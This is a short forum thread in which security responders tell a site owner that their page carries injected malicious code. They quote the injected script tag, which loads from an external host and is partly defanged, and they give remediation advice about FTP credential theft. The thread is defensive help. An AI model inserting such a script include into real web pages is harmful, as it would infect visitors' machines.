Hello :-),

Jaal Scan ID # 18734932084-184 output

Malicious code detected on line 158 of www.carolina-images.com

starts with

<!—ript src=hxxp://kat alog-s tron.waa.pl/temp lates_c/s>

Note: This is a free limited scan, please check out other pages too.

Please look at the copy of the page on the server after you have logged into your hosting directory using ftp/sftp/scp etc. Sometimes, it might be useful to wipe out the hosting directory. You can probably get a backup copy of your site from your hosting provider. Please remember to check for malware on the server and in the backend database too. Also, remember to scan your local computer with multiple Anti-virus engines to detect the presence of any resident malware.

If you have any specific issues feel free to ask for help.

We also provide vulnerability identification and mitigation services to help websites from being infected in the first place.
For free monitoring services, you can visit www.stopthehacker.com/services/blacklist-monitoring/.

Hope this helps,
-A

Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site:www.stopthehacker.com
Blog:www.stopthehacker.com/blog
Twitter: @stopthehacker
Facebook: stopthehacker
Jaal: Protecting the Internet, one website at a time™

Between your closing body tag and opening head tag you have:

<scr ipt src=http : // katalog-stron.waa. pl/templates_c/search.php ></script>

This is typically the result of a virus that steals FTP login credentials. You might find this virus on a PC that has FTP access to your website.

Let the forum here know if you have any further questions.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

Thanks to everyone for the info. That gives me a place to start.